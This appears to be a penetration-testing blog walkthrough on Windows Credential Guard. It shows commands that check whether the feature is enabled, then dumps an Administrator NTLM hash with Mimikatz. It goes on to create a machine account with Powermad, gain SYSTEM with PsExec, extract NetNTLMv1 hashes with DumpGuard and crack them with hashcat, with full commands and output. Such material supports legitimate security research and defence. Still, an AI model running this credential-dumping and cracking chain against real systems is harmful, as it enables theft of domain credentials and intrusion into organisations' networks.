Credential Guard is a Windows security feature that protects user credentials (such as NTLM hashes and Kerberos tickets) from being extracted from memory.
It does this by using Virtualization-Based Security (VBS) to isolate secrets away from the normal Windows operating system.
Checking for Credential Guard
When credential guard is configured, the system will have a running process of LsaIso.exe (Isolated Local Security Authority). This process runs insides VTL1 (Virtual Trust Level 1), which is essentially a virtual environment that is kept seperate to the rest of the operating system code.
PS C:\Users\alice> tasklist | findstr /i lsa
LsaIso.exe 732 Services 0 4,356 K
lsass.exe 740 Services 0 22,232 K
However, this does not necessarily mean credential guard is being used to store secrets. To determine that, query the common information model:
PS C:\Users\alice> (Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard)
AvailableSecurityProperties : {1, 2, 5}
CodeIntegrityPolicyEnforcementStatus : 0
InstanceIdentifier : 4ff40742-2649-41b8-bdd1-e80fad1cce80
RequiredSecurityProperties : {1, 2}
SecurityServicesConfigured : {1}
SecurityServicesRunning : {1}
UsermodeCodeIntegrityPolicyEnforcementStatus : 0
Version : 1.0
VirtualizationBasedSecurityStatus : 2
VirtualMachineIsolation : False
VirtualMachineIsolationProperties : {0}
PSComputerName :
If SecurityServicesRunning includes the number 1, credential guard is in use.
We can also determine this information using our previous developed C# code.
C:\>EnumMitigations.exe
[Device Guard]
VBS Status: Enabled
Credential Guard: Enabled
Memory Integrity (HVCI): Disabled
Configured Services: Credential Guard
Running Services: Credential Guard
[Tamper Protection]
Tamper Protection: Disabled
[Vulnerable Driver Blocklist]
Status: Disabled
Testing Mimikatz
Running Mimikatz on our system with credential guard enabled, we can see that we can’t directly retrieve the NTLM hash for user “alice”. The line “LSA Isolated Data: NtlmHash” indicates that her hash is stored in isolated LSA memory.
We can however still retrieve the domain administrators password, since a RID of 500 isn’t protected by credential guard 🙂
C:\Mimikatz>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1231743 (00000000:0012cb7f)
Session : RemoteInteractive from 3
User Name : alice
Domain : BORDERGATE
Logon Server : DC01
Logon Time : 12/02/2026 09:55:40
SID : S-1-5-21-906755679-2821052173-3607654525-1104
msv :
[00000003] Primary
* Username : alice
* Domain : BORDERGATE
* LSA Isolated Data: NtlmHash
KdfContext: bde9a832e1e47dfef8049e9da4ca78369b9016d357f8f49e0cd69d74d26d1c10
Tag : b4676de32733622ecd8e4571d7e5af67
AuthData : 0100000000000000000000000000000001000000340000004e746c6d48617368
Encrypted : 9bb6d131d14f31d3d7ad372f6a5329970fa44abb5ea6509b1d0fbd5d0adc8c010f71db6b79a95400c692870b041b8e9b2d58c32b
* DPAPI : 5df8e817eccf29239fc35709edd9b2ea
tspkg :
wdigest :
* Username : alice
* Domain : BORDERGATE
* Password : (null)
kerberos :
* Username : alice
* Domain : BORDERGATE.LOCAL
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 322698 (00000000:0004ec8a)
Session : RemoteInteractive from 2
User Name : Administrator
Domain : CREDGUARD
Logon Server : CREDGUARD
Logon Time : 12/02/2026 09:48:33
SID : S-1-5-21-1723896210-2506726654-3363034921-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : CREDGUARD
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
tspkg :
wdigest :
* Username : Administrator
* Domain : CREDGUARD
* Password : (null)
kerberos :
* Username : Administrator
* Domain : CREDGUARD
* Password : (null)
ssp :
credman :
cloudap :
mimikatz(commandline) # exit
Bye!
Bypassing Credential Guard
To bypass Credential Guard, we can use the tool DumpGuard. A full technical breakdown of how the tool works is available here: https://specterops.io/blog/2025/10/23/catching-credential-guard-off-guard/
For the tool to work, two things need to be in place – access to Remote Credential Guard, and a machine account.
When you connect to a system using Remote Credential Guard, the client does not send credentials to the server. The server forwards authentication requests back to the client which performs authentication on the servers behalf. The result of this process is then returned to the server.
The remote system acts as a proxy for authentication back to the client.
If an adversary controls a computer account, they can relay authentication back to the client where DumpGuard can intercept it.
By default, users in Active Directory can create 10 machine accounts. Use Powermad.ps1 to create a new machine account with a known password.
PS C:\Powermad> . .\Powermad.ps1
PS C:\Powermad> New-MachineAccount -MachineAccount TestMachine
Enter a password for the new machine account: *********
[+] Machine account TestMachine added
PS C:\Powermad>
To extract other users credentials with DumpGuard, you need SYSTEM access. Use PSEXEC to open a shell.
C:\DumpGuard>PsExec64.exe -s -i cmd.exe
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com
Running DumpGuard as SYSTEM successfully retrieves the credentials for users Alice and Bob. However, the Administrator account is not captured, as we previously established that it is not stored in LSAISO.
C:\DumpGuard>.\DumpGuard.exe /mode:all /domain:bordergate.local /username:TestMachine /password:Password1 /spn:HOST/TestMachine
BORDERGATE\alice::CREDGUARD::8614B8A84404B1C0333C8875A22BC10690BBF6A7EDCF549D:1122334455667788
Failed to dump credentials for 'CREDGUARD\Administrator': The client attempted to negotiate using NTLM
BORDERGATE\bob::CREDGUARD::8614B8A84404B1C0333C8875A22BC10690BBF6A7EDCF549D:1122334455667788
The passwords retrieved are NetNTLMv1, and can be cracked using hashcat with mode 5500.
┌──(kali㉿kali)-[~]
└─$ hashcat -D 1 -m 5500 captured_hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-AMD Ryzen 7 5700X3D 8-Core Processor, 2223/4446 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 2 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 513 MB (4601 MB free)
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
BORDERGATE\alice::CREDGUARD::8614b8a84404b1c0333c8875a22bc10690bbf6a7edcf549d:1122334455667788:Password1
In Conclusion
DumpGuard is effective at extracting secrets from Credential Guard, provided you have SYSTEM level access to the host, and control a machine account. It should be noted that NetNTLMv1 password hashes are particularly weak, and often break in seconds.